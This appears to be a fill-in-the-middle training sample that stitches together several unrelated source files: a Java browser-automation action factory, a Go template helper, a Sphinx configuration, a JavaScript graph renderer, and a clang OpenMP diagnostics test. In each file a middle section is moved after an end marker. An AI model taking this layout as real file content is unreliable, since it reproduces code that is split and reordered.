* the Free Software Foundation, either version 3 of the License, or
* (at your option) any later version.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License
* along with this program. If not, see <http://www.gnu.org/licenses/>.
*/
import java.net.MalformedURLException;
import java.util.HashMap;
import java.util.Map;
import beseenium.controller.ActionDataFactory.ActionDataFactory;<|fim▁hole|>import beseenium.controller.ActionFactory.elementActions.MakeGetCssValue;
import beseenium.controller.ActionFactory.elementActions.MakeGetLocation;
import beseenium.controller.ActionFactory.elementActions.MakeGetSize;
import beseenium.controller.ActionFactory.elementActions.MakeGetTagName;
import beseenium.controller.ActionFactory.elementActions.MakeGetText;
import beseenium.controller.ActionFactory.elementActions.MakeIsDisplayed;
import beseenium.controller.ActionFactory.elementActions.MakeIsEnabled;
import beseenium.controller.ActionFactory.elementActions.MakeIsSelected;
import beseenium.controller.ActionFactory.elementActions.MakeSendKeys;
import beseenium.controller.ActionFactory.elementActions.MakeSubmit;
import beseenium.controller.ActionFactory.findElementsBy.MakeFindElementsByClass;
import beseenium.controller.ActionFactory.findElementsBy.MakeFindElementsByCss;
import beseenium.controller.ActionFactory.findElementsBy.MakeFindElementsById;
import beseenium.controller.ActionFactory.findElementsBy.MakeFindElementsByLinkTxt;
import beseenium.controller.ActionFactory.findElementsBy.MakeFindElementsByName;
import beseenium.controller.ActionFactory.findElementsBy.MakeFindElementsByPartialLinkTxt;
import beseenium.controller.ActionFactory.findElementsBy.MakeFindElementsByTagName;
import beseenium.controller.ActionFactory.findElementsBy.MakeFindElementsByXpath;
import beseenium.controller.ActionFactory.navigateActions.MakeNavigateBack;
import beseenium.controller.ActionFactory.navigateActions.MakeNavigateForward;
import beseenium.controller.ActionFactory.navigateActions.MakeRefreshPage;
import beseenium.controller.ActionFactory.pageActions.MakeBrowserQuit;
import beseenium.controller.ActionFactory.pageActions.MakeGetPageSrc;
import beseenium.controller.ActionFactory.pageActions.MakeGetTitle;
import beseenium.controller.ActionFactory.pageActions.MakeGetURL;
import beseenium.controller.ActionFactory.pageActions.MakePageClose;
import beseenium.controller.ActionFactory.pageActions.MakePageGet;
import beseenium.exceptions.actionDataExceptions.ActionDataFactoryException;
import beseenium.exceptions.actionExceptions.ActionFactoryException;
import beseenium.model.action.AbstractAction;
/**
* this class is a factory for creating actions, it uses a factory method
* style pattern and a map implementation.
* @author JPC Hanson
*
*/
public class ActionFactory
{
/** the map to store the actions in **/
private Map<String, MakeAction> actionMap;
/** internal ActionDataFactory reference **/
private ActionDataFactory actionDataFactory;
/**
* default constructor creates and populates internal map
* @param actionDataFactory
* @throws ActionDataFactoryException
* @throws MalformedURLException
*
*/
public ActionFactory(ActionDataFactory actionDataFactory)
throws ActionDataFactoryException, MalformedURLException
{
super();
this.actionDataFactory = actionDataFactory;
this.actionMap = new HashMap<String, MakeAction>();
this.populateActionMap();
}
/**
* creates an Action
* @return AbstractAction
* @throws ActionFactoryException
* @throws ActionDataFactoryException
*/
public AbstractAction makeAction(String actionKey) throws ActionFactoryException
{
if(this.actionMap.containsKey(actionKey))
{return this.actionMap.get(actionKey).makeAction();}
else
{throw new ActionFactoryException("you cannot instanciate this type of Action '"
+actionKey+ "' Check your spelling, or refer to documentation");}
}
/**
* creates all possible actions and populates the map with them.
* @throws ActionDataFactoryException
*
*/
private void populateActionMap() throws ActionDataFactoryException
{
// //Page Actions
this.actionMap.put( "PageGet", new MakePageGet(actionDataFactory));
this.actionMap.put( "GetPageSrc", new MakeGetPageSrc(actionDataFactory));
this.actionMap.put( "BrowserQuit", new MakeBrowserQuit(actionDataFactory));
this.actionMap.put( "GetTitle", new MakeGetTitle(actionDataFactory));
this.actionMap.put( "GetURL", new MakeGetURL(actionDataFactory));
this.actionMap.put( "PageClose", new MakePageClose(actionDataFactory));
// //Navigation Actions
this.actionMap.put( "NavigateBack", new MakeNavigateBack(actionDataFactory));
this.actionMap.put( "NavigateForward", new MakeNavigateForward(actionDataFactory));
this.actionMap.put( "RefreshPage", new MakeRefreshPage(actionDataFactory));
// //Find Element Actions
this.actionMap.put( "FindElementsByClass", new MakeFindElementsByClass(actionDataFactory));
this.actionMap.put( "FindElementsByCss", new MakeFindElementsByCss(actionDataFactory));
this.actionMap.put( "FindElementsById", new MakeFindElementsById(actionDataFactory));
this.actionMap.put( "FindElementsByLinkTxt", new MakeFindElementsByLinkTxt(actionDataFactory));
this.actionMap.put( "FindElementsByName", new MakeFindElementsByName(actionDataFactory));
this.actionMap.put( "FindElementsByPartialLinkTxt", new MakeFindElementsByPartialLinkTxt(actionDataFactory));
this.actionMap.put( "FindElementsByTagName", new MakeFindElementsByTagName(actionDataFactory));
this.actionMap.put( "FindElementsByXpath", new MakeFindElementsByXpath(actionDataFactory));
// //Element Actions
this.actionMap.put( "Clear", new MakeClear(actionDataFactory));
this.actionMap.put( "Click", new MakeClick(actionDataFactory));
this.actionMap.put( "GetAttribute", new MakeGetAttribute(actionDataFactory));
this.actionMap.put( "GetCssValue", new MakeGetCssValue(actionDataFactory));
this.actionMap.put( "GetLocation", new MakeGetLocation(actionDataFactory));
this.actionMap.put( "GetSize", new MakeGetSize(actionDataFactory));
this.actionMap.put( "GetTagName", new MakeGetTagName(actionDataFactory));
this.actionMap.put( "GetText", new MakeGetText(actionDataFactory));
this.actionMap.put( "IsDisplayed", new MakeIsDisplayed(actionDataFactory));
this.actionMap.put( "IsEnabled", new MakeIsEnabled(actionDataFactory));
this.actionMap.put( "IsSelected", new MakeIsSelected(actionDataFactory));
this.actionMap.put( "SendKeys", new MakeSendKeys(actionDataFactory));
this.actionMap.put( "Submit", new MakeSubmit(actionDataFactory));
}
}<|fim▁end|>
|
import beseenium.controller.ActionFactory.elementActions.MakeClear;
import beseenium.controller.ActionFactory.elementActions.MakeClick;
import beseenium.controller.ActionFactory.elementActions.MakeGetAttribute;
|
<|file_name|>configrb.go<|end_file_name|><|fim▁begin|>package libclc
import (
"text/template"
"bufio"
)
<|fim▁hole|> return WriteTemplate("crb", config, t, path)
}
func BufferConfigrb(config *Configrb, t *template.Template, w *bufio.Writer) (error) {
return BufferTemplate("crb", config, t, w)
}<|fim▁end|>
|
type Configrb struct {
}
func WriteConfigrb(config *Configrb, t *template.Template, path string) (error) {
|
<|file_name|>conf.py<|end_file_name|><|fim▁begin|>import os
import runpy
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
#sys.path.insert(0, os.path.abspath('.'))
# -- General configuration ------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
#needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom
# ones.
extensions = [
'sphinx.ext.autodoc',
'sphinx.ext.intersphinx',
'sphinx.ext.pngmath',
]
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix of source filenames.
source_suffix = '.rst'
# The encoding of source files.
#source_encoding = 'utf-8-sig'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = u'pyHMSA'
copyright = u'2014, Philippe Pinard'
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The short X.Y version.
filepath = os.path.join(os.path.dirname(__file__),
'..', '..', 'pyhmsa', '__init__.py')
_vars = runpy.run_path(filepath)
version = _vars['__version__']
# The full version, including alpha/beta/rc tags.
release = version
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#language = None
# There are two options for replacing |today|: either, you set today to some
# non-false value, then it is used:
#today = ''
# Else, today_fmt is used as the format for a strftime call.
#today_fmt = '%B %d, %Y'
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
exclude_patterns = []
# The reST default role (used for this markup: `text`) to use for all
# documents.
#default_role = None
# If true, '()' will be appended to :func: etc. cross-reference text.
#add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
#add_module_names = True
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
#show_authors = False
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# A list of ignored prefixes for module index sorting.
#modindex_common_prefix = []
# If true, keep warnings as "system message" paragraphs in the built documents.
#keep_warnings = False
# -- Options for HTML output ----------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
html_theme = 'solar'
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
#html_theme_options = {}
# Add any paths that contain custom themes here, relative to this directory.
html_theme_path = ['_themes']
# The name for this set of Sphinx documents. If None, it defaults to
# "<project> v<release> documentation".
html_title = 'pyHMSA documentation'
# A shorter title for the navigation bar. Default is the same as html_title.
html_short_title = 'pyHMSA'
# The name of an image file (relative to this directory) to place at the top
# of the sidebar.
#html_logo = None
# The name of an image file (within the static path) to use as favicon of the
# docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32
# pixels large.
#html_favicon = None
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
# Add any extra paths that contain custom files (such as robots.txt or
# .htaccess) here, relative to this directory. These files are copied
# directly to the root of the documentation.
#html_extra_path = []
# If not '', a 'Last updated on:' timestamp is inserted at every page bottom,
# using the given strftime format.
#html_last_updated_fmt = '%b %d, %Y'
# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
#html_use_smartypants = True
# Custom sidebar templates, maps document names to template names.
#html_sidebars = {}
# Additional templates that should be rendered to pages, maps page names to
# template names.
#html_additional_pages = {}
# If false, no module index is generated.
#html_domain_indices = True
# If false, no index is generated.
#html_use_index = True
# If true, the index is split into individual pages for each letter.
#html_split_index = False
# If true, links to the reST sources are added to the pages.
html_show_sourcelink = False
# If true, "Created using Sphinx" is shown in the HTML footer. Default is True.
#html_show_sphinx = True
# If true, "(C) Copyright ..." is shown in the HTML footer. Default is True.
#html_show_copyright = True
# If true, an OpenSearch description file will be output, and all pages will
# contain a <link> tag referring to it. The value of this option must be the
# base URL from which the finished HTML is served.
#html_use_opensearch = ''
# This is the file name suffix for HTML files (e.g. ".xhtml").
#html_file_suffix = None
# Output file base name for HTML help builder.
htmlhelp_basename = 'pyHMSAdoc'
# -- Options for LaTeX output ---------------------------------------------
latex_elements = {
# The paper size ('letterpaper' or 'a4paper').
#'papersize': 'letterpaper',
# The font size ('10pt', '11pt' or '12pt').
#'pointsize': '10pt',
# Additional stuff for the LaTeX preamble.
#'preamble': '',
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title,
# author, documentclass [howto, manual, or own class]).
latex_documents = [
('index', 'pyHMSA.tex', u'pyHMSA Documentation',
u'Philippe Pinard', 'manual'),
]
# The name of an image file (relative to this directory) to place at the top of
# the title page.
#latex_logo = None
# For "manual" documents, if this is true, then toplevel headings are parts,
# not chapters.
#latex_use_parts = False
# If true, show page references after internal links.
#latex_show_pagerefs = False
# If true, show URL addresses after external links.
#latex_show_urls = False
# Documents to append as an appendix to all manuals.
#latex_appendices = []
# If false, no module index is generated.
#latex_domain_indices = True
# -- Options for manual page output ---------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
('index', 'pyhmsa', u'pyHMSA Documentation',
[u'Philippe Pinard'], 1)
]
# If true, show URL addresses after external links.
#man_show_urls = False
# -- Options for Texinfo output -------------------------------------------
# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
# dir menu entry, description, category)
texinfo_documents = [
('index', 'pyHMSA', u'pyHMSA Documentation',
u'Philippe Pinard', 'pyHMSA', 'One line description of project.',
'Miscellaneous'),
]
# Documents to append as an appendix to all manuals.
#texinfo_appendices = []
# If false, no module index is generated.
#texinfo_domain_indices = True
# How to display URL addresses: 'footnote', 'no', or 'inline'.
#texinfo_show_urls = 'footnote'
# If true, do not generate a @detailmenu in the "Top" node's menu.
#texinfo_no_detailmenu = False
# -- Options for Epub output ----------------------------------------------
# Bibliographic Dublin Core info.
epub_title = u'pyHMSA'
epub_author = u'Philippe Pinard'
epub_publisher = u'Philippe Pinard'
epub_copyright = u'2014, Philippe Pinard'
# The basename for the epub file. It defaults to the project name.
#epub_basename = u'pyHMSA'
# The HTML theme for the epub output. Since the default themes are not optimized
# for small screen space, using the same theme for HTML and epub output is
# usually not wise. This defaults to 'epub', a theme designed to save visual
# space.
#epub_theme = 'epub'
# The language of the text. It defaults to the language option
# or en if the language is not set.
#epub_language = ''
# The scheme of the identifier. Typical schemes are ISBN or URL.
#epub_scheme = ''
# The unique identifier of the text. This can be a ISBN number
# or the project homepage.
#epub_identifier = ''
# A unique identification for the text.
#epub_uid = ''<|fim▁hole|>
# A tuple containing the cover image and cover page html template filenames.
#epub_cover = ()
# A sequence of (type, uri, title) tuples for the guide element of content.opf.
#epub_guide = ()
# HTML files that should be inserted before the pages created by sphinx.
# The format is a list of tuples containing the path and title.
#epub_pre_files = []
# HTML files shat should be inserted after the pages created by sphinx.
# The format is a list of tuples containing the path and title.
#epub_post_files = []
# A list of files that should not be packed into the epub file.
#epub_exclude_files = []
# The depth of the table of contents in toc.ncx.
#epub_tocdepth = 3
# Allow duplicate toc entries.
#epub_tocdup = True
# Choose between 'default' and 'includehidden'.
#epub_tocscope = 'default'
# Fix unsupported image types using the PIL.
#epub_fix_images = False
# Scale large images.
#epub_max_image_width = 0
# How to display URL addresses: 'footnote', 'no', or 'inline'.
#epub_show_urls = 'inline'
# If false, no index is generated.
#epub_use_index = True
# Example configuration for intersphinx: refer to the Python standard library.
intersphinx_mapping = {'http://docs.python.org/': None}
autoclass_content = "both"
#autodoc_member_order = "bysource"
autodoc_default_flags = ['undoc-members']<|fim▁end|>
| |
<|file_name|>Entity.js<|end_file_name|><|fim▁begin|>//#include 'debug.js'
//#include 'Image.js'
//#include 'path/Ellipse.js'
//#include 'path/Path.js'
//#include 'path/Point.js'
//#include 'path/Rect.js'
//#include 'Tokenizer.js'
var CanvizEntity = exports.CanvizEntity = function(defaultAttrHashName, name, canviz, rootGraph, parentGraph, immediateGraph) {
this.defaultAttrHashName = defaultAttrHashName;
this.name = name;
this.canviz = canviz;
this.rootGraph = rootGraph;
this.parentGraph = parentGraph;
this.immediateGraph = immediateGraph;
this.attrs = {};
this.drawAttrs = {};
};
CanvizEntity.prototype = {
initBB: function() {
var matches = this.getAttr('pos').match(/([0-9.]+),([0-9.]+)/);
var x = Math.round(matches[1]);
var y = Math.round(this.canviz.height - matches[2]);
this.bbRect = new Rect(x, y, x, y);
},
getAttr: function(attrName, escString) {
if ('undefined' === typeof escString) escString = false;
var attrValue = this.attrs[attrName];
if ('undefined' === typeof attrValue) {
var graph = this.parentGraph;
while ('undefined' !== typeof graph) {
attrValue = graph[this.defaultAttrHashName][attrName];
if ('undefined' === typeof attrValue) {
graph = graph.parentGraph;
} else {
break;
}
}
}
if (attrValue && escString) {
attrValue = attrValue.replace(this.escStringMatchRe, _.bind(function(match, p1) {
switch (p1) {
case 'N': // fall through
case 'E': return this.name;
case 'T': return this.tailNode;
case 'H': return this.headNode;
case 'G': return this.immediateGraph.name;
case 'L': return this.getAttr('label', true);
}
return match;
}, this));
}
return attrValue;
},
draw: function(ctx, ctxScale, redrawCanvasOnly) {
var i, tokens, fillColor, strokeColor;
if (!redrawCanvasOnly) {
this.initBB();
var bbDiv = $('<div>');
bbDiv.addClass('entity');
this.canviz.elements.append(bbDiv);
var tooltip = this.getAttr('tooltip');
if (tooltip)
bbDiv.attr({title: tooltip});
}
_.each(this.drawAttrs, _.bind(function(command) {
// debug(command);
var tokenizer = new CanvizTokenizer(command);
var token = tokenizer.takeChars();
if (token) {
var dashStyle = 'solid';
ctx.save();
while (token) {
// debug('processing token ' + token);
switch (token) {
case 'E': // filled ellipse
case 'e': // unfilled ellipse
var filled = ('E' == token);
var cx = tokenizer.takeNumber();
var cy = this.canviz.height - tokenizer.takeNumber();
var rx = tokenizer.takeNumber();
var ry = tokenizer.takeNumber();
var path = new Ellipse(cx, cy, rx, ry);
break;
case 'P': // filled polygon
case 'p': // unfilled polygon
case 'L': // polyline
var filled = ('P' == token);
var closed = ('L' != token);
var numPoints = tokenizer.takeNumber();
tokens = tokenizer.takeNumber(2 * numPoints); // points
var path = new Path();
for (i = 2; i < 2 * numPoints; i += 2) {
path.addBezier([
new Point(tokens[i - 2], this.canviz.height - tokens[i - 1]),
new Point(tokens[i], this.canviz.height - tokens[i + 1])
]);
}
if (closed) {
path.addBezier([
new Point(tokens[2 * numPoints - 2], this.canviz.height - tokens[2 * numPoints - 1]),
new Point(tokens[0], this.canviz.height - tokens[1])
]);
}
break;
case 'B': // unfilled b-spline
case 'b': // filled b-spline
var filled = ('b' == token);
var numPoints = tokenizer.takeNumber();
tokens = tokenizer.takeNumber(2 * numPoints); // points
var path = new Path();
for (i = 2; i < 2 * numPoints; i += 6) {
path.addBezier([
new Point(tokens[i - 2], this.canviz.height - tokens[i - 1]),
new Point(tokens[i], this.canviz.height - tokens[i + 1]),
new Point(tokens[i + 2], this.canviz.height - tokens[i + 3]),
new Point(tokens[i + 4], this.canviz.height - tokens[i + 5])
]);
}
break;
case 'I': // image
var l = tokenizer.takeNumber();
var b = this.canviz.height - tokenizer.takeNumber();
var w = tokenizer.takeNumber();
var h = tokenizer.takeNumber();
var src = tokenizer.takeString();
if (!this.canviz.images[src]) {
this.canviz.images[src] = new CanvizImage(this.canviz, src);
}
this.canviz.images[src].draw(ctx, l, b - h, w, h);
break;
case 'T': // text
var l = Math.round(ctxScale * tokenizer.takeNumber() + this.canviz.padding);
var t = Math.round(ctxScale * this.canviz.height + 2 * this.canviz.padding - (ctxScale * (tokenizer.takeNumber() + this.canviz.bbScale * fontSize) + this.canviz.padding));
var textAlign = tokenizer.takeNumber();
var textWidth = Math.round(ctxScale * tokenizer.takeNumber());
var str = tokenizer.takeString();
if (!redrawCanvasOnly && !/^\s*$/.test(str)) {
// debug('draw text ' + str + ' ' + l + ' ' + t + ' ' + textAlign + ' ' + textWidth);
str = _.str.escapeHTML(str);
do {
matches = str.match(/ ( +)/);
if (matches) {
var spaces = ' ';
_(matches[1].length).times(function() {
spaces += ' ';
});
str = str.replace(/ +/, spaces);
}
} while (matches);
var text;
var href = this.getAttr('URL', true) || this.getAttr('href', true);
if (href) {
var target = this.getAttr('target', true) || '_self';
var tooltip = this.getAttr('tooltip', true) || this.getAttr('label', true);
// debug(this.name + ', href ' + href + ', target ' + target + ', tooltip ' + tooltip);
text = $('<a>').attrs({href: href, target: target, title: tooltip});
_.each(['onclick', 'onmousedown', 'onmouseup', 'onmouseover', 'onmousemove', 'onmouseout'], _.bind(function(attrName) {
var attrValue = this.getAttr(attrName, true);
if (attrValue) {
text.writeAttribute(attrName, attrValue);
}
}, this));
text.css({
textDecoration: 'none'
});
} else {
text = $('<span>');
}
text.html(str);
text.css({
fontSize: Math.round(fontSize * ctxScale * this.canviz.bbScale) + 'px',
fontFamily: fontFamily,
color: strokeColor.textColor,
position: 'absolute',
textAlign: (-1 == textAlign) ? 'left' : (1 == textAlign) ? 'right' : 'center',
left: (l - (1 + textAlign) * textWidth) + 'px',
top: t + 'px',
width: (2 * textWidth) + 'px'
});
if (1 !== strokeColor.opacity)
text.setOpacity(strokeColor.opacity);
$(this.canviz.elements).append(text);
}<|fim▁hole|> var color = this.parseColor(tokenizer.takeString());
if (fill) {
fillColor = color;
ctx.fillStyle = color.canvasColor;
} else {
strokeColor = color;
ctx.strokeStyle = color.canvasColor;
}
break;
case 'F': // set font
fontSize = tokenizer.takeNumber();
fontFamily = tokenizer.takeString();
switch (fontFamily) {
case 'Times-Roman':
fontFamily = 'Times New Roman';
break;
case 'Courier':
fontFamily = 'Courier New';
break;
case 'Helvetica':
fontFamily = 'Arial';
break;
default:
// nothing
}
// debug('set font ' + fontSize + 'pt ' + fontFamily);
break;
case 'S': // set style
var style = tokenizer.takeString();
switch (style) {
case 'solid':
case 'filled':
// nothing
break;
case 'dashed':
case 'dotted':
dashStyle = style;
break;
case 'bold':
ctx.lineWidth = 2;
break;
default:
matches = style.match(/^setlinewidth\((.*)\)$/);
if (matches) {
ctx.lineWidth = Number(matches[1]);
} else {
debug('unknown style ' + style);
}
}
break;
default:
debug('unknown token ' + token);
return;
}
if (path) {
this.canviz.drawPath(ctx, path, filled, dashStyle, this);
if (!redrawCanvasOnly) this.bbRect.expandToInclude(path.getBB());
path = undefined;
}
token = tokenizer.takeChars();
}
if (!redrawCanvasOnly) {
var xOff = 0, yOff = 0;
bbDiv.css({
position: 'absolute',
left: Math.round(ctxScale * (this.bbRect.l + xOff) + this.canviz.padding) + 'px',
top: Math.round(ctxScale * (this.bbRect.t + yOff) + this.canviz.padding) + 'px',
width: Math.round(ctxScale * this.bbRect.getWidth()) + 'px',
height: Math.round(ctxScale * this.bbRect.getHeight()) + 'px'
});
}
ctx.restore();
}
}, this));
},
parseColor: function(color) {
var parsedColor = {opacity: 1};
// rgb/rgba
if (/^#(?:[0-9a-f]{2}\s*){3,4}$/i.test(color)) {
return this.canviz.parseHexColor(color);
}
// hsv
var matches = color.match(/^(\d+(?:\.\d+)?)[\s,]+(\d+(?:\.\d+)?)[\s,]+(\d+(?:\.\d+)?)$/);
if (matches) {
parsedColor.canvasColor = parsedColor.textColor = this.canviz.hsvToRgbColor(matches[1], matches[2], matches[3]);
return parsedColor;
}
// named color
var colorScheme = this.getAttr('colorscheme') || 'X11';
var colorName = color;
matches = color.match(/^\/(.*)\/(.*)$/);
if (matches) {
if (matches[1]) {
colorScheme = matches[1];
}
colorName = matches[2];
} else {
matches = color.match(/^\/(.*)$/);
if (matches) {
colorScheme = 'X11';
colorName = matches[1];
}
}
colorName = colorName.toLowerCase();
var colorSchemeName = colorScheme.toLowerCase();
var colorSchemeData = Canviz.prototype.colors[colorSchemeName];
if (colorSchemeData) {
var colorData = colorSchemeData[colorName];
if (colorData) {
return this.canviz.parseHexColor('#' + colorData);
}
}
colorData = Canviz.prototype.colors['fallback'][colorName];
if (colorData) {
return this.canviz.parseHexColor('#' + colorData);
}
if (!colorSchemeData) {
debug('unknown color scheme ' + colorScheme);
}
// unknown
debug('unknown color ' + color + '; color scheme is ' + colorScheme);
parsedColor.canvasColor = parsedColor.textColor = '#000000';
return parsedColor;
}
};<|fim▁end|>
|
break;
case 'C': // set fill color
case 'c': // set pen color
var fill = ('C' == token);
|
<|file_name|>master_taskloop_simd_lastprivate_messages.cpp<|end_file_name|><|fim▁begin|>// RUN: %clang_cc1 -verify=expected,omp45 -fopenmp-version=45 -fopenmp %s -Wuninitialized
// RUN: %clang_cc1 -verify=expected,omp50 -fopenmp-version=50 -fopenmp %s -Wuninitialized
// RUN: %clang_cc1 -verify=expected,omp45 -fopenmp-version=45 -fopenmp-simd %s -Wuninitialized
// RUN: %clang_cc1 -verify=expected,omp50 -fopenmp-version=50 -fopenmp-simd %s -Wuninitialized
typedef void **omp_allocator_handle_t;
extern const omp_allocator_handle_t omp_default_mem_alloc;
extern const omp_allocator_handle_t omp_large_cap_mem_alloc;
extern const omp_allocator_handle_t omp_const_mem_alloc;
extern const omp_allocator_handle_t omp_high_bw_mem_alloc;
extern const omp_allocator_handle_t omp_low_lat_mem_alloc;
extern const omp_allocator_handle_t omp_cgroup_mem_alloc;
extern const omp_allocator_handle_t omp_pteam_mem_alloc;
extern const omp_allocator_handle_t omp_thread_mem_alloc;
void foo() {
}
bool foobool(int argc) {
return argc;
}
struct S1; // expected-note 2 {{declared here}} expected-note 2 {{forward declaration of 'S1'}}
extern S1 a;
class S2 {
mutable int a;
public:
S2() : a(0) {}
S2(S2 &s2) : a(s2.a) {}
const S2 &operator =(const S2&) const;
S2 &operator =(const S2&);
static float S2s; // expected-note {{static data member is predetermined as shared}}
static const float S2sc; // expected-note {{'S2sc' declared here}}
};
const float S2::S2sc = 0;
const S2 b;
const S2 ba[5];
class S3 {
int a;
S3 &operator=(const S3 &s3); // expected-note 2 {{implicitly declared private here}}
public:
S3() : a(0) {}
S3(S3 &s3) : a(s3.a) {}
};
const S3 c; // expected-note {{'c' defined here}}
const S3 ca[5]; // expected-note {{'ca' defined here}}
extern const int f; // expected-note {{'f' declared here}}
class S4 {
int a;
S4(); // expected-note 3 {{implicitly declared private here}}
S4(const S4 &s4);
public:
S4(int v) : a(v) {}
};
class S5 {
int a;
S5() : a(0) {} // expected-note {{implicitly declared private here}}
public:
S5(const S5 &s5) : a(s5.a) {}
S5(int v) : a(v) {}
};
class S6 {
int a;
S6() : a(0) {}
public:
S6(const S6 &s6) : a(s6.a) {}
S6(int v) : a(v) {}
};
S3 h;
#pragma omp threadprivate(h) // expected-note 2 {{defined as threadprivate or thread local}}
template <class I, class C>
int foomain(int argc, char **argv) {
I e(4);
I g(5);
int i, z;
int &j = i;
#pragma omp parallel
#pragma omp master taskloop simd lastprivate // expected-error {{expected '(' after 'lastprivate'}}
for (int k = 0; k < argc; ++k)
++k;
#pragma omp parallel
#pragma omp master taskloop simd lastprivate( // expected-error {{expected expression}} expected-error {{expected ')'}} expected-note {{to match this '('}}
for (int k = 0; k < argc; ++k)
++k;
#pragma omp parallel
#pragma omp master taskloop simd lastprivate() // expected-error {{expected expression}}
for (int k = 0; k < argc; ++k)
++k;
#pragma omp parallel
#pragma omp master taskloop simd lastprivate(argc // expected-error {{expected ')'}} expected-note {{to match this '('}}
for (int k = 0; k < argc; ++k)
++k;
#pragma omp parallel
#pragma omp master taskloop simd lastprivate(argc, // expected-error {{expected expression}} expected-error {{expected ')'}} expected-note {{to match this '('}}
for (int k = 0; k < argc; ++k)
++k;
#pragma omp parallel
#pragma omp master taskloop simd lastprivate(argc > 0 ? argv[1] : argv[2]) // expected-error {{expected variable name}}
for (int k = 0; k < argc; ++k)
++k;
#pragma omp parallel
#pragma omp master taskloop simd lastprivate(argc) allocate , allocate(, allocate(omp_default , allocate(omp_default_mem_alloc, allocate(omp_default_mem_alloc:, allocate(omp_default_mem_alloc: argc, allocate(omp_default_mem_alloc: argv), allocate(argv) // expected-error {{expected '(' after 'allocate'}} expected-error 2 {{expected expression}} expected-error 2 {{expected ')'}} expected-error {{use of undeclared identifier 'omp_default'}} expected-note 2 {{to match this '('}}
for (int k = 0; k < argc; ++k)
++k;
#pragma omp parallel
#pragma omp master taskloop simd lastprivate(S1) // expected-error {{'S1' does not refer to a value}}
for (int k = 0; k < argc; ++k)
++k;
#pragma omp parallel
#pragma omp master taskloop simd lastprivate(conditional: argc) lastprivate(conditional: // expected-error 2 {{use of undeclared identifier 'conditional'}} expected-error {{expected ')'}} expected-note {{to match this '('}}
for (int k = 0; k < argc; ++k)
++k;
#pragma omp parallel
#pragma omp master taskloop simd lastprivate(z, a, b) // expected-error {{lastprivate variable with incomplete type 'S1'}}
for (int k = 0; k < argc; ++k)
++k;
#pragma omp parallel
#pragma omp master taskloop simd lastprivate(argv[1]) // expected-error {{expected variable name}}
for (int k = 0; k < argc; ++k)
++k;
#pragma omp parallel
#pragma omp master taskloop simd lastprivate(e, g) // expected-error 2 {{calling a private constructor of class 'S4'}}
for (int k = 0; k < argc; ++k)
++k;
#pragma omp parallel
#pragma omp master taskloop simd lastprivate(h) // expected-error {{threadprivate or thread local variable cannot be lastprivate}}
for (int k = 0; k < argc; ++k)
++k;
#pragma omp parallel
{
int v = 0;
int i;
#pragma omp master taskloop simd lastprivate(i) allocate(omp_thread_mem_alloc: i) // expected-warning {{allocator with the 'thread' trait access has unspecified behavior on 'master taskloop simd' directive}}
for (int k = 0; k < argc; ++k) {
i = k;
v += i;
}
}
#pragma omp parallel shared(i)
#pragma omp parallel private(i)
#pragma omp master taskloop simd lastprivate(j)
for (int k = 0; k < argc; ++k)
++k;
#pragma omp parallel
#pragma omp master taskloop simd lastprivate(i)
for (int k = 0; k < argc; ++k)
++k;
return 0;
}
void bar(S4 a[2]) {
#pragma omp parallel
#pragma omp master taskloop simd lastprivate(a)
for (int i = 0; i < 2; ++i)
foo();
}
namespace A {
double x;
#pragma omp threadprivate(x) // expected-note {{defined as threadprivate or thread local}}
}
namespace B {
using A::x;
}
int main(int argc, char **argv) {
const int d = 5; // expected-note {{'d' defined here}}
const int da[5] = {0}; // expected-note {{'da' defined here}}
S4 e(4);
S5 g(5);
S3 m;
S6 n(2);
int i, z;
int &j = i;
#pragma omp parallel
#pragma omp master taskloop simd lastprivate // expected-error {{expected '(' after 'lastprivate'}}
for (i = 0; i < argc; ++i)
foo();
#pragma omp parallel
#pragma omp master taskloop simd lastprivate( // expected-error {{expected expression}} expected-error {{expected ')'}} expected-note {{to match this '('}}
for (i = 0; i < argc; ++i)
foo();
#pragma omp parallel
#pragma omp master taskloop simd lastprivate() // expected-error {{expected expression}}
for (i = 0; i < argc; ++i)
foo();
#pragma omp parallel
#pragma omp master taskloop simd lastprivate(argc // expected-error {{expected ')'}} expected-note {{to match this '('}}
for (i = 0; i < argc; ++i)<|fim▁hole|> for (i = 0; i < argc; ++i)
foo();
#pragma omp parallel
#pragma omp master taskloop simd lastprivate(argc > 0 ? argv[1] : argv[2]) // expected-error {{expected variable name}}
for (i = 0; i < argc; ++i)
foo();
#pragma omp parallel
#pragma omp master taskloop simd lastprivate(argc, z)
for (i = 0; i < argc; ++i)
foo();
#pragma omp parallel
#pragma omp master taskloop simd lastprivate(S1) // expected-error {{'S1' does not refer to a value}}
for (i = 0; i < argc; ++i)
foo();
#pragma omp parallel
